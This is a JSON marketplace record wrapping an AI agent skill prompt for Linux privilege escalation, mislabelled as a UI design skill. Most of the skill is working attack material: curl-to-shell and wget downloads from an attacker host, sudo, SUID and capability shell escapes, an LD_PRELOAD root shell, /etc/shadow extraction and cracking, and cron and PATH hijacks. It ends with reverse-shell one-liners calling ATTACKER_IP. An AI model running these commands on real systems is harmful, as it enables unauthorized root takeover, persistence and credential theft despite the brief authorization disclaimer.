[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-a3710919-48e5-43b6-b657-03af4207d6dd":3,"$fOy4rGAXB4x09q6AlioqHorn4j-8F8uDdnvQ3cM2QME4":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"a3710919-48e5-43b6-b657-03af4207d6dd","linux-privilege-escalation","Perform systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses in order to elevate from low-privilege user access to root-level control.","cat_design_ui","mod_design","sickn33,design","---\nname: linux-privilege-escalation\ndescription: \"Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n\u003C!-- security-allowlist: curl-pipe-bash -->\n\n# Linux Privilege Escalation\n\n## Purpose\n\nExecute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. 
This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.\n\n## Inputs \u002F Prerequisites\n\n### Required Access\n- Low-privilege shell access to target Linux system\n- Ability to execute commands (interactive or semi-interactive shell)\n- Network access for reverse shell connections (if needed)\n- Attacker machine for payload hosting and receiving shells\n\n### Technical Requirements\n- Understanding of Linux filesystem permissions and ownership\n- Familiarity with common Linux utilities and scripting\n- Knowledge of kernel versions and associated vulnerabilities\n- Basic understanding of compilation (gcc) for custom exploits\n\n### Recommended Tools\n- LinPEAS, LinEnum, or Linux Smart Enumeration scripts\n- Linux Exploit Suggester (LES)\n- GTFOBins reference for binary exploitation\n- John the Ripper or Hashcat for password cracking\n- Netcat or similar for reverse shells\n\n## Outputs \u002F Deliverables\n\n### Primary Outputs\n- Root shell access on target system\n- Privilege escalation path documentation\n- System enumeration findings report\n- Recommendations for remediation\n\n### Evidence Artifacts\n- Screenshots of successful privilege escalation\n- Command output logs demonstrating root access\n- Identified vulnerability details\n- Exploited configuration files\n\n## Core Workflow\n\n### Phase 1: System Enumeration\n\n#### Basic System Information\nGather fundamental system details for vulnerability research:\n\n```bash\n# Hostname and system role\nhostname\n\n# Kernel version and architecture\nuname -a\n\n# Detailed kernel information\ncat \u002Fproc\u002Fversion\n\n# Operating system details\ncat \u002Fetc\u002Fissue\ncat \u002Fetc\u002F*-release\n\n# Architecture\narch\n```\n\n#### User and Permission Enumeration\n\n```bash\n# Current user context\nwhoami\nid\n\n# Users with login shells\ncat \u002Fetc\u002Fpasswd | grep 
-v nologin | grep -v false\n\n# Users with home directories\ncat \u002Fetc\u002Fpasswd | grep home\n\n# Group memberships\ngroups\n\n# Other logged-in users\nw\nwho\n```\n\n#### Network Information\n\n```bash\n# Network interfaces\nifconfig\nip addr\n\n# Routing table\nip route\n\n# Active connections\nnetstat -antup\nss -tulpn\n\n# Listening services\nnetstat -l\n```\n\n#### Process and Service Enumeration\n\n```bash\n# All running processes\nps aux\nps -ef\n\n# Process tree view\nps axjf\n\n# Services running as root\nps aux | grep root\n```\n\n#### Environment Variables\n\n```bash\n# Full environment\nenv\n\n# PATH variable (for hijacking)\necho $PATH\n```\n\n### Phase 2: Automated Enumeration\n\nDeploy automated scripts for comprehensive enumeration:\n\n```bash\n# LinPEAS\ncurl -L https:\u002F\u002Fgithub.com\u002Fcarlospolop\u002FPEASS-ng\u002Freleases\u002Flatest\u002Fdownload\u002Flinpeas.sh | sh\n\n# LinEnum\n.\u002FLinEnum.sh -t\n\n# Linux Smart Enumeration\n.\u002Flse.sh -l 1\n\n# Linux Exploit Suggester\n.\u002Fles.sh\n```\n\nTransfer scripts to target system:\n\n```bash\n# On attacker machine\npython3 -m http.server 8000\n\n# On target machine\nwget http:\u002F\u002FATTACKER_IP:8000\u002Flinpeas.sh\nchmod +x linpeas.sh\n.\u002Flinpeas.sh\n```\n\n### Phase 3: Kernel Exploits\n\n#### Identify Kernel Version\n\n```bash\nuname -r\ncat \u002Fproc\u002Fversion\n```\n\n#### Search for Exploits\n\n```bash\n# Use Linux Exploit Suggester\n.\u002Flinux-exploit-suggester.sh\n\n# Manual search on exploit-db\nsearchsploit linux kernel [version]\n```\n\n#### Common Kernel Exploits\n\n| Kernel Version | Exploit | CVE |\n|---------------|---------|-----|\n| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |\n| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |\n| 5.8+ | Dirty Pipe | CVE-2022-0847 |\n\n#### Compile and Execute\n\n```bash\n# Transfer exploit source\nwget http:\u002F\u002FATTACKER_IP\u002Fexploit.c\n\n# Compile on target\ngcc exploit.c -o exploit\n\n# 
Execute\n.\u002Fexploit\n```\n\n### Phase 4: Sudo Exploitation\n\n#### Enumerate Sudo Privileges\n\n```bash\nsudo -l\n```\n\n#### GTFOBins Sudo Exploitation\nReference https:\u002F\u002Fgtfobins.github.io for exploitation commands:\n\n```bash\n# Example: vim with sudo\nsudo vim -c ':!\u002Fbin\u002Fbash'\n\n# Example: find with sudo\nsudo find . -exec \u002Fbin\u002Fsh \\; -quit\n\n# Example: awk with sudo\nsudo awk 'BEGIN {system(\"\u002Fbin\u002Fbash\")}'\n\n# Example: python with sudo\nsudo python -c 'import os; os.system(\"\u002Fbin\u002Fbash\")'\n\n# Example: less with sudo\nsudo less \u002Fetc\u002Fpasswd\n!\u002Fbin\u002Fbash\n```\n\n#### LD_PRELOAD Exploitation\nWhen env_keep includes LD_PRELOAD:\n\n```c\n\u002F\u002F shell.c\n#include \u003Cstdio.h>\n#include \u003Csys\u002Ftypes.h>\n#include \u003Cstdlib.h>\n\nvoid _init() {\n    unsetenv(\"LD_PRELOAD\");\n    setgid(0);\n    setuid(0);\n    system(\"\u002Fbin\u002Fbash\");\n}\n```\n\n```bash\n# Compile shared library\ngcc -fPIC -shared -o shell.so shell.c -nostartfiles\n\n# Execute with sudo\nsudo LD_PRELOAD=\u002Ftmp\u002Fshell.so find\n```\n\n### Phase 5: SUID Binary Exploitation\n\n#### Find SUID Binaries\n\n```bash\nfind \u002F -type f -perm -04000 -ls 2>\u002Fdev\u002Fnull\nfind \u002F -perm -u=s -type f 2>\u002Fdev\u002Fnull\n```\n\n#### Exploit SUID Binaries\nReference GTFOBins for SUID exploitation:\n\n```bash\n# Example: base64 for file reading\nLFILE=\u002Fetc\u002Fshadow\nbase64 \"$LFILE\" | base64 -d\n\n# Example: cp for file writing\ncp \u002Fbin\u002Fbash \u002Ftmp\u002Fbash\nchmod +s \u002Ftmp\u002Fbash\n\u002Ftmp\u002Fbash -p\n\n# Example: find with SUID\nfind . 
-exec \u002Fbin\u002Fsh -p \\; -quit\n```\n\n#### Password Cracking via SUID\n\n```bash\n# Read shadow file (if base64 has SUID)\nbase64 \u002Fetc\u002Fshadow | base64 -d > shadow.txt\nbase64 \u002Fetc\u002Fpasswd | base64 -d > passwd.txt\n\n# On attacker machine\nunshadow passwd.txt shadow.txt > hashes.txt\njohn --wordlist=\u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt hashes.txt\n```\n\n#### Add User to passwd (if nano\u002Fvim has SUID)\n\n```bash\n# Generate password hash\nopenssl passwd -1 -salt new newpassword\n\n# Add to \u002Fetc\u002Fpasswd (using SUID editor)\nnewuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:\u002Froot:\u002Fbin\u002Fbash\n```\n\n### Phase 6: Capabilities Exploitation\n\n#### Enumerate Capabilities\n\n```bash\ngetcap -r \u002F 2>\u002Fdev\u002Fnull\n```\n\n#### Exploit Capabilities\n\n```bash\n# Example: python with cap_setuid\n\u002Fusr\u002Fbin\u002Fpython3 -c 'import os; os.setuid(0); os.system(\"\u002Fbin\u002Fbash\")'\n\n# Example: vim with cap_setuid\n.\u002Fvim -c ':py3 import os; os.setuid(0); os.execl(\"\u002Fbin\u002Fbash\", \"bash\", \"-c\", \"reset; exec bash\")'\n\n# Example: perl with cap_setuid\nperl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"\u002Fbin\u002Fbash\";'\n```\n\n### Phase 7: Cron Job Exploitation\n\n#### Enumerate Cron Jobs\n\n```bash\n# System crontab\ncat \u002Fetc\u002Fcrontab\n\n# User crontabs\nls -la \u002Fvar\u002Fspool\u002Fcron\u002Fcrontabs\u002F\n\n# Cron directories\nls -la \u002Fetc\u002Fcron.*\n\n# Systemd timers\nsystemctl list-timers\n```\n\n#### Exploit Writable Cron Scripts\n\n```bash\n# Identify writable cron script from \u002Fetc\u002Fcrontab\nls -la \u002Fopt\u002Fbackup.sh        # Check permissions\necho 'bash -i >& \u002Fdev\u002Ftcp\u002FATTACKER_IP\u002F4444 0>&1' >> \u002Fopt\u002Fbackup.sh\n\n# If cron references non-existent script in writable PATH\necho -e '#!\u002Fbin\u002Fbash\\nbash -i >& \u002Fdev\u002Ftcp\u002FATTACKER_IP\u002F4444 0>&1' > 
\u002Fhome\u002Fuser\u002Fantivirus.sh\nchmod +x \u002Fhome\u002Fuser\u002Fantivirus.sh\n```\n\n### Phase 8: PATH Hijacking\n\n```bash\n# Find SUID binary calling external command\nstrings \u002Fusr\u002Flocal\u002Fbin\u002Fsuid-binary\n# Shows: system(\"service apache2 start\")\n\n# Hijack by creating malicious binary in writable PATH\nexport PATH=\u002Ftmp:$PATH\necho -e '#!\u002Fbin\u002Fbash\\n\u002Fbin\u002Fbash -p' > \u002Ftmp\u002Fservice\nchmod +x \u002Ftmp\u002Fservice\n\u002Fusr\u002Flocal\u002Fbin\u002Fsuid-binary      # Execute SUID binary\n```\n\n### Phase 9: NFS Exploitation\n\n```bash\n# On target - look for no_root_squash option\ncat \u002Fetc\u002Fexports\n\n# On attacker - mount share and create SUID binary\nshowmount -e TARGET_IP\nmount -o rw TARGET_IP:\u002Fshare \u002Ftmp\u002Fnfs\n\n# Create and compile SUID shell\necho 'int main(){setuid(0);setgid(0);system(\"\u002Fbin\u002Fbash\");return 0;}' > \u002Ftmp\u002Fnfs\u002Fshell.c\ngcc \u002Ftmp\u002Fnfs\u002Fshell.c -o \u002Ftmp\u002Fnfs\u002Fshell && chmod +s \u002Ftmp\u002Fnfs\u002Fshell\n\n# On target - execute\n\u002Fshare\u002Fshell\n```\n\n## Quick Reference\n\n### Enumeration Commands Summary\n| Purpose | Command |\n|---------|---------|\n| Kernel version | `uname -a` |\n| Current user | `id` |\n| Sudo rights | `sudo -l` |\n| SUID files | `find \u002F -perm -u=s -type f 2>\u002Fdev\u002Fnull` |\n| Capabilities | `getcap -r \u002F 2>\u002Fdev\u002Fnull` |\n| Cron jobs | `cat \u002Fetc\u002Fcrontab` |\n| Writable dirs | `find \u002F -writable -type d 2>\u002Fdev\u002Fnull` |\n| NFS exports | `cat \u002Fetc\u002Fexports` |\n\n### Reverse Shell One-Liners\n```bash\n# Bash\nbash -i >& \u002Fdev\u002Ftcp\u002FATTACKER_IP\u002F4444 0>&1\n\n# Python\npython -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"\u002Fbin\u002Fbash\",\"-i\"])'\n\n# Netcat\nnc -e \u002Fbin\u002Fbash 
ATTACKER_IP 4444\n\n# Perl\nperl -e 'use Socket;$i=\"ATTACKER_IP\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"\u002Fbin\u002Fbash -i\");'\n```\n\n### Key Resources\n- GTFOBins: https:\u002F\u002Fgtfobins.github.io\n- LinPEAS: https:\u002F\u002Fgithub.com\u002Fcarlospolop\u002FPEASS-ng\n- Linux Exploit Suggester: https:\u002F\u002Fgithub.com\u002Fmzet-\u002Flinux-exploit-suggester\n\n## Constraints and Guardrails\n\n### Operational Boundaries\n- Verify kernel exploits in test environment before production use\n- Failed kernel exploits may crash the system\n- Document all changes made during privilege escalation\n- Maintain access persistence only as authorized\n\n### Technical Limitations\n- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)\n- AppArmor\u002FSELinux may restrict exploitation techniques\n- Container environments limit kernel-level exploits\n- Hardened systems may have restricted sudo configurations\n\n### Legal and Ethical Requirements\n- Written authorization required before testing\n- Stay within defined scope boundaries\n- Report critical findings immediately\n- Do not access data beyond scope requirements\n\n## Examples\n\n### Example 1: Sudo to Root via find\n\n**Scenario**: User has sudo rights for find command\n\n```bash\n$ sudo -l\nUser user may run the following commands:\n    (root) NOPASSWD: \u002Fusr\u002Fbin\u002Ffind\n\n$ sudo find . 
-exec \u002Fbin\u002Fbash \\; -quit\n# id\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n### Example 2: SUID base64 for Shadow Access\n\n**Scenario**: base64 binary has SUID bit set\n\n```bash\n$ find \u002F -perm -u=s -type f 2>\u002Fdev\u002Fnull | grep base64\n\u002Fusr\u002Fbin\u002Fbase64\n\n$ base64 \u002Fetc\u002Fshadow | base64 -d\nroot:$6$xyz...:18000:0:99999:7:::\n\n# Crack offline with john\n$ john --wordlist=rockyou.txt shadow.txt\n```\n\n### Example 3: Cron Job Script Hijacking\n\n**Scenario**: Root cron job executes writable script\n\n```bash\n$ cat \u002Fetc\u002Fcrontab\n* * * * * root \u002Fopt\u002Fscripts\u002Fbackup.sh\n\n$ ls -la \u002Fopt\u002Fscripts\u002Fbackup.sh\n-rwxrwxrwx 1 root root 50 \u002Fopt\u002Fscripts\u002Fbackup.sh\n\n$ echo 'cp \u002Fbin\u002Fbash \u002Ftmp\u002Fbash; chmod +s \u002Ftmp\u002Fbash' >> \u002Fopt\u002Fscripts\u002Fbackup.sh\n\n# Wait 1 minute\n$ \u002Ftmp\u002Fbash -p\n# id\nuid=1000(user) gid=1000(user) euid=0(root)\n```\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| Exploit compilation fails | Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static` |\n| Reverse shell not connecting | Check firewall; try ports 443\u002F80; use staged payloads; check egress filtering |\n| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor\u002FSELinux; some binaries drop privileges |\n| Cron job not executing | Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,246,1950,"2026-05-16 13:26:41",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"Design & Creativity","design","mdi-palette-outline","Creative skills such as UI design, generative art, and brand visuals",3,"2026-05-16 
12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"UI Design","ui-design","mdi-monitor-cellphone","Interface design, interaction guidelines, design systems",1,36,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"b3dea010-9db8-41b7-a230-92925c73b7f6","1.0.0","linux-privilege-escalation.zip",4700,"uploads\u002Fskills\u002Fa3710919-48e5-43b6-b657-03af4207d6dd\u002Flinux-privilege-escalation.zip","9edb6ca8fe62c5d9587253ad37d7406496bcf79c22236e6ed770912808584e35","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":11857}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]